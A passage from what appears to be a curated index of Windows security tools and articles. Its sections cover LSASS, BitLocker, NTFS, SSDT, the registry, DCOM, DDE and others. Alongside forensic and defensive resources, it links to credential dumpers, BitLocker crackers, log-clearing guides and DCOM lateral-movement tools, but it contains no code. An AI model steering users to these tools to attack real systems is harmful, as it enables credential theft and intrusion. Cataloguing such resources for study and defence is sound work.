2018.08 [4sysops] [Query multiple Windows event logs with PowerShell](https://4sysops.com/archives/query-multiple-windows-event-logs-with-powershell/) - 2018.07 [criteo] [Grab ETW Session, Providers and Events](http://labs.criteo.com/2018/07/grab-etw-session-providers-and-events/) - 2018.07 [3gstudent] [Windows Event Viewer Log (EVT)单条日志清除(三)——删除当前系统指定指定时间段evt日志记录](https://3gstudent.github.io/3gstudent.github.io/Windows-Event-Viewer-Log-(EVT)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%B8%89-%E5%88%A0%E9%99%A4%E5%BD%93%E5%89%8D%E7%B3%BB%E7%BB%9F%E6%8C%87%E5%AE%9A%E6%8C%87%E5%AE%9A%E6%97%B6%E9%97%B4%E6%AE%B5evt%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95/) - 2018.07 [3gstudent] [Windows Event Viewer Log (EVT)单条日志清除(三)——删除当前系统指定指定时间段evt日志记录](https://3gstudent.github.io/3gstudent.github.io/Windows-Event-Viewer-Log-(EVT)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%B8%89-%E5%88%A0%E9%99%A4%E5%BD%93%E5%89%8D%E7%B3%BB%E7%BB%9F%E6%8C%87%E5%AE%9A%E6%8C%87%E5%AE%9A%E6%97%B6%E9%97%B4%E6%AE%B5evt%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95/) *** ## <a id="fe0ba7bd911de751b4cc28c9e1a6cb28"></a>Lsass ### <a id="94693a3207198ec3c995deb0f38cc22c"></a>工具 - [**489**星][20d] [Py] [hackndo/lsassy](https://github.com/hackndo/lsassy) Extract credentials from lsass remotely - [**356**星][11d] [Py] [aas-n/spraykatz](https://github.com/aas-n/spraykatz) Credentials gathering tool automating remote procdump and parse of lsass process. - [**315**星][13d] [C] [outflanknl/dumpert](https://github.com/outflanknl/dumpert) LSASS memory dumper using direct system calls and API unhooking. ### <a id="b8904d923ae77cf3c230ee1e07717572"></a>文章 - 2020.02 [freebuf] [Lsassy:如何远程从lsaas中提取用户凭证](https://www.freebuf.com/sectool/226170.html) - 2020.01 [rsa] [Using RSA NetWitness to Detect Credential Harvesting: lsassy](https://community.rsa.com/community/products/netwitness/blog/2020/01/06/using-rsa-netwitness-to-detect-credential-harvesting-lsassy) - 2019.12 [jimwilbur] [Defender Quarantines Lsass Dumps](https://www.wilbursecurity.com/2019/12/defender-quarantines-lsass-dumps/) - 2019.12 [4hou] [绕过WDATP获取LSASS进程数据](https://www.4hou.com/web/22071.html) - 2019.07 [markmotig] [Some ways to dump LSASS.exe](https://medium.com/p/c4a75fdc49bf) - 2019.05 [osandamalith] [Shellcode to Dump the Lsass Process](https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/) - 2019.01 [astr0baby] [AndrewSpecial – stealthy lsass.exe memory dumping](https://astr0baby.wordpress.com/2019/01/21/andrewspecial-stealthy-lsass-exe-memory-dumping/) - 2018.01 [stealthbits] [Market Trends: Announcing StealthINTERCEPT 5.0 General Availability – With Enterprise Password Enforcer & LSASS Guardian™](https://blog.stealthbits.com/market-trends-announcing-stealthintercept-5-0-general-availability-with-enterprise-password-enforcer/) - 2017.10 [360] [绕过LSASS的SACL审计](https://www.anquanke.com/post/id/87107/) - 2017.10 [tyranidslair] [Bypassing SACL Auditing on LSASS](https://tyranidslair.blogspot.com/2017/10/bypassing-sacl-auditing-on-lsass.html) - 2017.10 [tyranidslair] [Bypassing SACL Auditing on LSASS](https://www.tiraniddo.dev/2017/10/bypassing-sacl-auditing-on-lsass.html) - 2017.01 [360] [MS16-137:LSASS远程拒绝服务漏洞分析](https://www.anquanke.com/post/id/85324/) - 2016.11 [g] [MS16-137: LSASS Remote Memory Corruption Advisory](http://g-laurent.blogspot.com/2016/11/ms16-137-lsass-remote-memory-corruption.html) - 2016.02 [govolution] [Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump](https://govolution.wordpress.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-1-mimikatz-lsass-exe-dump/) - 2011.12 [pentestmonkey] [mimikatz: Tool To Recover Cleartext Passwords From Lsass](http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass) - 2008.03 [pediy] [[原创]磁碟机病毒(com\lsass.exe、smss.exe、dnsq.dll)新变种之anti方式及感染EXE文件方式跟踪](https://bbs.pediy.com/thread-61461.htm) - 2006.09 [sans] [CA eTrust Antivirus [was] flagging lsass.e x e](https://isc.sans.edu/forums/diary/CA+eTrust+Antivirus+was+flagging+lsasse+x+e/1665/) - 2005.03 [sans] [Yahoo Messenger worm?; exploited.lsass.cc bot traffic](https://isc.sans.edu/forums/diary/Yahoo+Messenger+worm+exploitedlsasscc+bot+traffic/485/) - 2004.05 [sans] [-UPDATE- Sasser Worm , Week in Review; LSASS Exploit Analysis; SANSFIRE 2004](https://isc.sans.edu/forums/diary/UPDATE+Sasser+Worm+Week+in+Review+LSASS+Exploit+Analysis+SANSFIRE+2004/181/) - 2004.04 [sans] [PhatBot exploiting LSASS?](https://isc.sans.edu/forums/diary/PhatBot+exploiting+LSASS/178/) *** ## <a id="5aa94d550d4ead20c77cb4c609378a40"></a>BitLocker ### <a id="624af4702d96b0df8f89e6142815f034"></a>工具 - [**772**星][3m] [C] [aorimn/dislocker](https://github.com/aorimn/dislocker) FUSE driver to read/write Windows' BitLocker-ed volumes under Linux / Mac OSX - [**347**星][1y] [C] [e-ago/bitcracker](https://github.com/e-ago/bitcracker) BitLocker密码破解器 ### <a id="734243fcb4f539b563072a725e24b75f"></a>文章 - 2020.01 [4sysops] [Store and Retrieve BitLocker Recovery Keys from Active Directory](https://4sysops.com/archives/store-and-retrieve-bitlocker-recovery-keys-from-active-directory/) - 2019.10 [4sysops] [Specops Key Recovery: Self-service for unlocking BitLocker-encrypted devices](https://4sysops.com/archives/specops-key-recovery-self-service-for-unlocking-bitlocker-encrypted-devices/) - 2019.09 [codeinsecurity] [Recovering BitLocker when the BCD has been modified](https://codeinsecurity.wordpress.com/2019/09/23/recovering-bitlocker-when-the-bcd-has-been-modified/) - 2019.06 [security] [[PL] Co to jest BitLocker oraz TPM? Jak działa szyfrowanie dysków?](https://security.szurek.pl/co-to-jest-bitlocker-oraz-tpm-jak-dziala-szyfrowanie-dyskow.html) - 2019.06 [KacperSzurek] [Co to jest BitLocker oraz TPM? Jak działa szyfrowanie dysków?](https://www.youtube.com/watch?v=HdZIuSKn8gU) - 2019.04 [4hou] [如何从TPM中提取BitLocker私钥](https://www.4hou.com/web/16812.html) - 2019.02 [4sysops] [Find BitLocker recovery passwords in Active Directory with PowerShell](https://4sysops.com/archives/find-bitlocker-recovery-passwords-in-active-directory-with-powershell/) - 2019.01 [arxiv] [[1901.01337] BitCracker: BitLocker meets GPUs](https://arxiv.org/abs/1901.01337) - 2018.12 [360] [基于Win7的Bitlocker加密分析及实战思路](https://www.anquanke.com/post/id/167329/) - 2018.11 [contextis] [Hardware Encryption Weaknesses and BitLocker](https://www.contextis.com/en/blog/hardware-encryption-weaknesses-and-bitlocker) - 2018.11 [contextis] [Hardware Encryption Weaknesses and BitLocker](https://www.contextis.com/en/blog/hardware-enctyption-weaknesses-and-bitlocker) - 2018.05 [irq5] [Crypto-Erasing BitLocker Drives](http://irq5.io/2018/05/10/crypto-erasing-bitlocker-drives/) - 2018.04 [NetworkHeros] [How to Recover BitLocker Corrupted Drive (100% Guarantee)](https://www.youtube.com/watch?v=jbMnficpEm0) - 2018.01 [elcomsoft] [How to Instantly Access BitLocker, TrueCrypt, PGP and FileVault 2 Volumes](https://blog.elcomsoft.com/2018/01/how-to-instantly-access-bitlocker-truecrypt-pgp-and-filevault-2-volumes/) - 2017.10 [deepsec] [DeepSec 2017 Talk: BitCracker – BitLocker Meets GPUs – Elena Agostini](http://blog.deepsec.net/deepsec-2017-talk-bitcracker-bitlocker-meets-gpus-elena-agostini/) - 2017.09 [n0where] [Open Source BitLocker Password Cracking Tool: BitCracker](https://n0where.net/open-source-bitlocker-password-cracking-tool-bitcracker) - 2017.09 [4hou] [“密码找回”功能暗藏杀机,可绕过Windows auth &BitLocker](http://www.4hou.com/system/7570.html) - 2017.09 [freebuf] [利用忘记密码功能绕过Windows auth & BitLocker](http://www.freebuf.com/articles/web/145994.html) - 2017.09 [gameofpwnz] [Dislocker USB with Bitlocker (LAB)](https://gameofpwnz.com/?p=536) - 2017.09 [gameofpwnz] [Dislocker: Recovering Data from Drive with BitLocker – Requires Bitlocker Recovery Key or Password](https://gameofpwnz.com/?p=521) *** ## <a id="645dbf50d2f476c438e48af8c9bcd78c"></a>NTFS ### <a id="64624c6440889198d1c69ab40f1a5cf3"></a>工具 - [**582**星][1y] [mtivadar/windows10_ntfs_crash_dos](https://github.com/mtivadar/windows10_ntfs_crash_dos) Windows NTFS文件系统崩溃漏洞PoC - [**270**星][17d] [Py] [dkovar/analyzemft](https://github.com/dkovar/analyzemft) fully parse the MFT file from an NTFS filesystem and present the results as accurately as possible in multiple format - [**234**星][21d] [C] [pbatard/uefi-ntfs](https://github.com/pbatard/uefi-ntfs) UEFI:NTFS - Boot NTFS partitions from UEFI ### <a id="a976da792a1490b26da931174e05ee8f"></a>文章 - 2019.08 [X13Cubed] [NTFS Journal Forensics](https://www.youtube.com/watch?v=1mwiShxREm8) - 2019.03 [4sysops] [FolderSecurityViewer: Analyze and report on effective NTFS permissions](https://4sysops.com/archives/foldersecurityviewer-analyze-and-report-on-effective-ntfs-permissions/) - 2019.03 [4hou] [Windows NTFS文件系统目录大小写敏感导致的安全问题](https://www.4hou.com/system/16271.html) - 2019.02 [4hou] [渗透技巧——Windows下NTFS文件的USN Journal](http://www.4hou.com/technology/16265.html) - 2019.02 [tyranidslair] [NTFS Case Sensitivity on Windows](https://tyranidslair.blogspot.com/2019/02/ntfs-case-sensitivity-on-windows.html) - 2019.02 [tyranidslair] [NTFS Case Sensitivity on Windows](https://www.tiraniddo.dev/2019/02/ntfs-case-sensitivity-on-windows.html) - 2019.01 [4hou] [渗透技巧——Windows下NTFS文件的时间属性](http://www.4hou.com/technology/15877.html) - 2019.01 [3gstudent] [渗透技巧——Windows下NTFS文件的USN Journal](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8BNTFS%E6%96%87%E4%BB%B6%E7%9A%84USN-Journal/) - 2019.01 [3gstudent] [渗透技巧——Windows下NTFS文件的USN Journal](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8BNTFS%E6%96%87%E4%BB%B6%E7%9A%84USN-Journal/) - 2019.01 [sans] [Forgotten but Not Gone: Gathering NTFS Artifacts of Detection](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1544032916.pdf) - 2019.01 [sans] [Forgotten But Not Gone: Gathering NTFS Artifacts of Deletion](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1555082102.pdf) - 2018.12 [3gstudent] [渗透技巧——Windows下NTFS文件的时间属性](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8BNTFS%E6%96%87%E4%BB%B6%E7%9A%84%E6%97%B6%E9%97%B4%E5%B1%9E%E6%80%A7/) - 2018.12 [3gstudent] [渗透技巧——Windows下NTFS文件的时间属性](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8BNTFS%E6%96%87%E4%BB%B6%E7%9A%84%E6%97%B6%E9%97%B4%E5%B1%9E%E6%80%A7/) - 2018.10 [osr] [NTFS Status Debugging](https://www.osr.com/blog/2018/10/17/ntfs-status-debugging/) - 2018.09 [] [NTFS Object IDs in EnCase – Part 3](https://4n6ir.com/2018/09/28/ntfs-object-ids-in-encase-part-3/) - 2018.09 [] [NTFS Object IDs in X-Ways](https://4n6ir.com/2018/09/25/ntfs-object-ids-in-x-ways/) - 2018.09 [] [NTFS Object IDs in EnCase – Part 2](https://4n6ir.com/2018/09/24/ntfs-object-ids-in-encase-part-2/) - 2018.09 [] [NTFS Object IDs in EnCase](https://4n6ir.com/2018/09/20/ntfs-object-ids-in-encase/) - 2018.09 [secjuice] [Hiding In Plain Sight With NTFS Steganography](https://www.secjuice.com/ntfs-steganography-hiding-in-plain-sight/) - 2018.08 [pediy] [[翻译]渗透测试的WINDOWS NTFS技巧集合](https://bbs.pediy.com/thread-246089.htm) *** ## <a id="b16c5b961088f60a61567d28844e9224"></a>SSDT ### <a id="59abc34487b51ce7a5383d3f37308eac"></a>工具 ### <a id="6d2a886ff4abcae02d0968c17d4adfe2"></a>文章 - 2018.12 [pediy] [[原创]过用户层HOOK 驱动层SSDT HOOK (之进程保护篇)](https://bbs.pediy.com/thread-248583.htm) - 2018.11 [pediy] [[分享][原创]Win7 x86 SSDT Inline Hook](https://bbs.pediy.com/thread-247983.htm) - 2018.04 [pediy] [[原创]ROOTKIT 核心技术——利用 NT!_MDL(内存描述符链表)突破 SSDT(系统服务描述符表)的只读访问限制 PART I](https://bbs.pediy.com/thread-225998.htm) - 2017.05 [pediy] [[分享]发布一个 遍历shadowssdt函数名_驱动源码](https://bbs.pediy.com/thread-217807.htm) - 2016.05 [pediy] [[原创]关于Win7 x64 Shadow SSDT 的探索和 Inline HOOK](https://bbs.pediy.com/thread-210481.htm) - 2015.12 [insinuator] [Investigating Memory Analysis Tools – SSDT Hooking via Pointer Replacement](https://insinuator.net/2015/12/investigating-memory-analysis-tools-ssdt-hooking-via-pointer-replacement/) - 2015.09 [pediy] [[原创]旧代码分享:绕过卡巴斯基主动防御,加载驱动,unhook所有SSDT&Shadow SSDT](https://bbs.pediy.com/thread-204492.htm) - 2015.09 [pediy] [原创 普及X64 ssdtshadow inline HOOK](https://bbs.pediy.com/thread-204323.htm) - 2015.08 [lightless] [基于SSDT的注册表主防系统](https://lightless.me/archives/SSDT-Registry-Defend.html) - 2015.06 [pediy] [[原创]发个xp~win10_x86/x64全兼容的ShadowSSDT获取函数](https://bbs.pediy.com/thread-201130.htm) - 2015.05 [pediy] [[原创]SSDT InlineHook学习笔记](https://bbs.pediy.com/thread-200431.htm) - 2014.05 [pediy] [[分享]新手学内核第二篇 Shadow SSDT](https://bbs.pediy.com/thread-187755.htm) - 2013.12 [pediy] [[原创]SSDT Hook 详细过程](https://bbs.pediy.com/thread-183132.htm) - 2013.12 [pediy] [[原创]Win8 32位中SSDT Shadow Hook的实现方法](https://bbs.pediy.com/thread-182355.htm) - 2013.08 [pediy] [[原创]浅谈系列之-Add New SSDT 长夜漫漫-看流星](https://bbs.pediy.com/thread-177094.htm) - 2013.08 [pediy] [[原创]Win32Asm 驱动学习笔记《 HOOK SSDT》](https://bbs.pediy.com/thread-176717.htm) - 2013.08 [pediy] [[原创]新手学ssdt_hook](https://bbs.pediy.com/thread-176477.htm) - 2013.06 [pediy] [[原创]一份简单的内核通用HOOK 带使用例子(带简单SSDT恢复)~](https://bbs.pediy.com/thread-174170.htm) - 2013.04 [pediy] [[原创]简单调用任意未导出SSDT函数方法](https://bbs.pediy.com/thread-167515.htm) - 2012.07 [pediy] [[原创]汇编与驱动-绕过SSDT保护进程](https://bbs.pediy.com/thread-153211.htm) *** ## <a id="23d474a347ac76b1ba3a1f5b178d5db9"></a>Windows Registry ### <a id="7e46b2cafccc94889e3ac2722bf6b321"></a>工具 ### <a id="bc2ad2bfa13e8f6877934465ea611bf8"></a>文章 - 2020.01 [4sysops] [Audit changes in the Windows registry](https://4sysops.com/archives/audit-changes-in-the-windows-registry/) - 2019.08 [hackerhurricane] [The Windows Registry Auditing Cheat Sheet update! Aug 2019, v2.5](http://hackerhurricane.blogspot.com/2019/08/the-windows-registry-auditing-cheat.html) - 2019.03 [hecfblog] [Daily Blog #640: Regipy - A new python windows registry forensics library](https://www.hecfblog.com/2019/03/daily-blog-640-regipy-new-python.html) - 2019.01 [fireeye] [Digging Up the Past: Windows Registry Forensics Revisited](https://www.fireeye.com/blog/threat-research/2019/01/digging-up-the-past-windows-registry-forensics-revisited.html) - 2019.01 [sans] [Plumbing the Depths - Windows Registry Internals](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1492180849.pdf) - 2018.03 [hackers] [Digital Forensics, Part 5: Analyzing the Windows Registry for Evidence](https://www.hackers-arise.com/single-post/2016/10/21/Digital-Forensics-Part-5-Analyzing-the-Windows-Registry-for-Evidence) - 2018.02 [ZeroNights] [[Defensive Track]Maxim Suhanov - In depth forensic analysis of Windows registry files](https://www.youtube.com/watch?v=24fwhj40WGQ) - 2017.04 [redcanary] [Windows Registry Attacks: Knowledge Is the Best Defense](https://redcanary.com/blog/windows-registry-attacks-threat-detection/) - 2017.02 [alienvault] [Are Windows Registry Fixers Safe?](https://www.alienvault.com/blogs/security-essentials/should-windows-users-beware-of-registry-fixers) - 2016.04 [windowsir] [Windows Registry Forensics, 2E](http://windowsir.blogspot.com/2016/04/windows-registry-forensics-2e.html) - 2014.08 [trendmicro] [POWELIKS: Malware Hides In Windows Registry](https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/) - 2013.09 [cylance] [Windows Registry Persistence, Part 2: The Run Keys and Search-Order](https://www.cylance.com/en_us/blog/windows-registry-persistence-part-2-the-run-keys-and-search-order.html) - 2013.08 [cylance] [Windows Registry Persistence, Part 1: Introduction, Attack Phases and Windows Services](https://www.cylance.com/en_us/blog/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services.html) - 2009.07 [windowsir] [Windows Registry Forensic Analysis](http://windowsir.blogspot.com/2009/07/windows-registry-forensic-analysis.html) - 2009.05 [moyix] [Comprehensive New Resource on the Windows Registry](http://moyix.blogspot.com/2009/05/comprehensive-new-resource-on-windows.html) - 2008.02 [moyix] [CredDump: Extract Credentials from Windows Registry Hives](http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html) - 2005.09 [windowsir] [The Windows Registry as a Forensic Resource](http://windowsir.blogspot.com/2005/09/windows-registry-as-forensic-resource.html) - 2005.08 [sans] [Updated Windows Registry Concealment Info;Symantec AV Vulnerability](https://isc.sans.edu/forums/diary/Updated+Windows+Registry+Concealment+InfoSymantec+AV+Vulnerability/637/) *** ## <a id="9f0ddf6e87cbaabd865deebde52699d4"></a>Component Object Model(COM) ### <a id="77b9b279c18b90c20f672b68cc946da1"></a>工具 *** ## <a id="798eea99c85b0c02ecbde54172e9e11b"></a>Distributed Component Object Model(DCOM) ### <a id="424a04890b93f5642ee2f69e394c9be8"></a>工具 - [**225**星][10d] [PS] [outflanknl/excel4-dcom](https://github.com/outflanknl/excel4-dcom) PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe) - [**207**星][1y] [PS] [sud0woodo/dcomrade](https://github.com/sud0woodo/dcomrade) Powershell script for enumerating vulnerable DCOM Applications ### <a id="b496048006faecf5545e9eb75072e718"></a>文章 - 2019.03 [freebuf] [DCOMrade:一款枚举DCOM应用漏洞的PowerSHell脚本](https://www.freebuf.com/sectool/197710.html) - 2018.12 [n0where] [Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade](https://n0where.net/powershell-script-for-enumerating-vulnerable-dcom-applications-dcomrade) - 2018.12 [360] [CVE-2015-2370之DCOM DCE/RPC协议原理详细分析](https://www.anquanke.com/post/id/167057/) - 2018.12 [pediy] [[原创]CVE-2015-2370之DCOM DCE/RPC协议原理详细分析](https://bbs.pediy.com/thread-248128.htm) - 2018.07 [360] [LethalHTA 一种结合DCOM和HTA的新型横向渗透技术](https://www.anquanke.com/post/id/151286/) - 2018.07 [codewhitesec] [LethalHTA - A new lateral movement technique using DCOM and HTA](https://codewhitesec.blogspot.com/2018/07/lethalhta.html) - 2018.06 [4hou] [另一种滥用DCOM的内网渗透技术](http://www.4hou.com/penetration/12155.html) - 2018.05 [360] [如何滥用DCOM实现横向渗透](https://www.anquanke.com/post/id/107097/) - 2018.05 [pediy] [[翻译] 利用“导出函数和DCOM接口”执行穿透指令、实现横向渗透](https://bbs.pediy.com/thread-226540.htm) - 2018.04 [bohops] [利用DCOM实现远程Payload执行和横向渗透](https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/) - 2018.03 [DoktorCranium] [VAX msrpc dcom ms03 026](https://www.youtube.com/watch?v=S32xkMGPw1M) - 2018.03 [360] [如何利用导出函数和暴露的DCOM接口来实现横向渗透](https://www.anquanke.com/post/id/101648/) - 2018.03 [bohops] [利用DLL的导出函数和暴露的DCOM接口实现内网渗透](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/) - 2018.01 [cybereason] [New lateral movement techniques abuse DCOM technology](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) - 2017.11 [cybereason] [结合 Excel DDE 和 DCOM实现内网渗透](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom) - 2017.10 [4hou] [域渗透——利用DCOM在远程系统执行程序](http://www.4hou.com/technology/7713.html) - 2017.09 [aliyun] [无视Office宏安全设置,利用EXCEL.APPLICATION和DCOM渗透内网](https://xz.aliyun.com/t/1010) - 2017.09 [4hou] [无视Office宏安全设置,利用EXCEL.APPLICATION和DCOM渗透内网](http://www.4hou.com/system/7816.html) - 2017.09 [3gstudent] [域渗透——利用DCOM在远程系统执行程序](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F/) - 2017.09 [3gstudent] [域渗透——利用DCOM在远程系统执行程序](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F/) *** ## <a id="9c0d0ea748ac8de5396932422c6cce10"></a>Dynamic Data Exchange(DDE) ### <a id="5ff2332e36459054c8bf3ccd30480a1a"></a>文章 - 2017.11 [fortinet] [Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol](https://www.fortinet.com/blog/threat-research/cybercriminals-exploiting-microsoft-s-vulnerable-dynamic-data-exchange-protocol.html) - 2017.10 [mcafee] [Code Execution Technique Takes Advantage of Dynamic Data Exchange](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/code-execution-technique-takes-advantage-of-dynamic-data-exchange/) - 2017.10 [mcafee] [Code Execution Technique Takes Advantage of Dynamic Data Exchange](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/code-execution-technique-takes-advantage-of-dynamic-data-exchange/) - 2017.10 [mcafee] [Code Execution Technique Takes Advantage of Dynamic Data Exchange](https://securingtomorrow.mcafee.com/mcafee-labs/code-execution-technique-takes-advantage-of-dynamic-data-exchange/) - 2017.10 [homjxi0e] [execute Commands And Coding in MSFT Word Via Exploiting application dynamic data exchange //DDE//](https://homjxi0e.wordpress.com/2017/10/15/execute-commands-and-coding-in-msft-word-via-exploiting-application-dynamic-data-exchange-dde/) *** ## <a id="b05deb0cee0274fb02b27dd33edb80d1"></a>Compiled HTML Help(CHM) ### <a id="a68ed31e2457d7ec9143428d05a8a755"></a>文章 - 2015.05 [checkpoint] [The Microsoft Help File (.chm) May Enslave You | Check Point Software Blog](https://blog.checkpoint.com/2015/05/12/the-microsoft-help-file-chm-may-enslave-you/) - 2015.03 [brashconcepts] [New CryptoWall Attack: Block .CHM Extensions](http://brashconcepts.com/new-cryptowall-attack-block-chm-extensions/) - 2015.03 [freebuf] [.Chm格式帮助文件作盾,CryptoWall勒索软件卷土重来](http://www.freebuf.com/news/60537.html) - 2009.06 [pediy] [[原创]关于“IDA Pro 5.4 中文帮助手册.chm”在IDA打开文件时按F1出现错误的解决方法](https://bbs.pediy.com/thread-92503.htm) *** ## <a id="cd351af78b7ca5139f3ae343ecb0dd9c"></a>WinSxS ### <a id="1db8c6803d4c2abbdedc18aee7f85c8d"></a>工具 *** ## <a id="01210feb166b95c19ba9ac374f06a291"></a>WoW64 ### <a id="eb82daa5fe43dfd74bc02c47e2c4afe8"></a>工具 ### <a id="c6ca09f3f8597935d70aaf695629dc3a"></a>文章 - 2019.10 [hexacorn] [IsWow64Process2](http://www.hexacorn.com/blog/2019/10/26/iswow64process2/) - 2019.07 [subTee] [System32||Syswow64\Tasks\Tasks.dll](https://medium.com/p/d5b1a8ac7e50) - 2019.04 [corelan] [Windows 10 egghunter (wow64) and more](https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/) - 2019.04 [fsx30] [Hooking Heaven’s Gate — a WOW64 hooking technique](https://medium.com/p/5235e1aeed73) - 2019.01 [sans] [The WOW Effect - or how Microsoft's WOW64 technology unintentionally fools IT Security analysts](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493925774.pdf) - 2018.11 [aliyun] [Hook深度研究:监视WOW64程序在系统中的执行情况](https://xz.aliyun.com/t/3311) - 2018.03 [sentinelone] [深度Hook: 监控Wow64程序的Native执行. Part 3](https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-3/) - 2018.03 [sentinelone] [深度Hook: 监控WOW64应用程序的Native执行 Part 2](https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-2/) - 2017.09 [pediy] [[分享][原创]汇编里看Wow64的原理(浅谈32位程序是怎样在windows 64上运行的?)](https://bbs.pediy.com/thread-221236.htm) - 2016.09 [sogeti] [Deep-Dive in WoW64](http://esec-lab.sogeti.com/posts/2016/09/12/deep-dive-wow64.html) - 2016.08 [x64dbg] [64bit Debugging and the WoW64 File System Redirection](https://x64dbg.com/blog/2016/08/27/supporting-wow64-debugging.html) - 2016.07 [corelan] [Windows 10 x86/wow64 Userland heap](https://www.corelan.be/index.php/2016/07/05/windows-10-x86wow64-userland-heap/) - 2015.12 [rewolf] [wow64ext v1.0.0.8](http://blog.rewolf.pl/blog/?p=1484) - 2015.11 [modexp] [DLL/PIC Injection on Windows from Wow64 process](https://modexp.wordpress.com/2015/11/19/dllpic-injection-on-windows-from-wow64-process/) - 2015.11 [tekwizz123] [Some Observations On Duo Security's "WoW64 and So Can You" Paper](http://tekwizz123.blogspot.com/2015/11/some-observations-on-duo-securitys.html) - 2015.11 [duo] [WoW64 and So Can You](https://duo.com/blog/wow64-and-so-can-you) - 2015.08 [nul] [6.1.7600 (Win7 SP0) WinTrustVerify在关闭Wow64FsRedirection之后会出问题](http://www.nul.pw/2015/08/04/101.html) - 2015.06 [rewolf] [wow64ext v1.0.0.7](http://blog.rewolf.pl/blog/?p=1394) - 2015.06 [codereversing] [Syscall Hooking Under WoW64: Implementation (2/2)](http://www.codereversing.com/blog/archives/246) - 2015.06 [rewolf] [WoW64 internals: Unexpected behaviour of NtQueryDirectoryObject](http://blog.rewolf.pl/blog/?p=1273) *** ## <a id="0f805859001b5b52d63a7172bd44cdf6"></a>Background Intelligent Transfer Service(BITS) ### <a id="b2f8f87055fddd1cf1c2c11401ad4e04"></a>工具 *** ## <a id="a658066df321965f221208dd00abe422"></a>Batch Script(.bat) ### <a id="b1c6b964c60022c9dcd4ff69072dbda5"></a>工具 - [**268**星][9m] [Batchfile] [diogo-fernan/ir-rescue](https://github.com/diogo-fernan/ir-rescue) A Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response. - [**216**星][9d] [PS] [enjoiz/privesc](https://github.com/enjoiz/privesc) Windows batch script that finds misconfiguration issues which can lead to privilege escalation. ### <a id="af21157c602c6800e744db567fd3e43c"></a>文章 - 2019.07 [markmotig] [Write, Compile and Run a C# program in a single batch file](https://medium.com/p/ba1206f9208d) - 2018.07 [sans] [Windows Batch File Deobfuscation](https://isc.sans.edu/forums/diary/Windows+Batch+File+Deobfuscation/23916/) - 2018.07 [lallouslab] [Batchography: Parsing INI files from a Batch file](http://lallouslab.net/2018/07/23/batchography-parsing-ini-files-from-a-batch-file/) - 2018.06 [ironcastle] [Malicious Post-Exploitation Batch File, (Tue, Jun 5th)](https://www.ironcastle.net/malicious-post-exploitation-batch-file-tue-jun-5th/) - 2018.06 [sans] [Malicious Post-Exploitation Batch File](https://isc.sans.edu/forums/diary/Malicious+PostExploitation+Batch+File/23735/) - 2018.01 [HACKTRONIAN] [Create Dangerous Viruses - Batch File (.bat) & Executable File (.exe)](https://www.youtube.com/watch?v=PXZuZY4tcCs) - 2017.08 [fossmint] [KRename – A Powerful Batch File Renamer for Linux](https://www.fossmint.com/krename-batch-file-renamer-for-linux/) - 2016.01 [sentinelone] [XRTN: More batch script-based Ransomware](https://www.sentinelone.com/blog/xrtn-more-batch-script-based-ransomware/) - 2014.02 [dfstream] [USB Device Tracking Batch Script](https://df-stream.com/2014/02/usb-device-tracking-batch-scrip/) - 2012.03 [securityblog] [Start or Stop Windows Service using batch file](http://securityblog.gr/577/start-or-stop-windows-service-using-batch-file/) - 2008.08 [securitythinkingcap] [Pipe Dream: Data migration with batch files](https://securitythinkingcap.com/pipe-dream/) *** ## <a id="bf6cc44eeb15bfccaf0bf3750be50e2b"></a>DACL ### <a id="e7f9728a252a6e224e64a49da24b7312"></a>工具 - [**333**星][11d] [PS] [canix1/adaclscanner](https://github.com/canix1/adaclscanner) Repo for ADACLScan.ps1 - Your number one script for ACL's in Active Directory ### <a 